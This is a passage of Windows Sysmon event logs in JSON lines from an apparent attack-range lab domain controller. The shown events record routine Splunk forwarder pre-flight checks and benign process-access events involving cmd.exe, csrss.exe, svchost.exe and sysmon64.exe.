MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {E2A3D6B1-1104-5F25-0000-0010EF890500}\r\nParentProcessId: 92\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2>&1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.537","ProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010EF890500}","ParentProcessId":"92","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2&gt;&amp;1","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3651,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010EF890500}\r\nSourceProcessId: 92\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nTargetProcessId: 3828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010EF890500}","SourceProcessId":"92","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","TargetProcessId":"3828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3652,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010B08A0500}\r\nTargetProcessId: 3828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010B08A0500}","TargetProcessId":"3828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3653,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3654,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3655,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3656,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3657,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3658,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
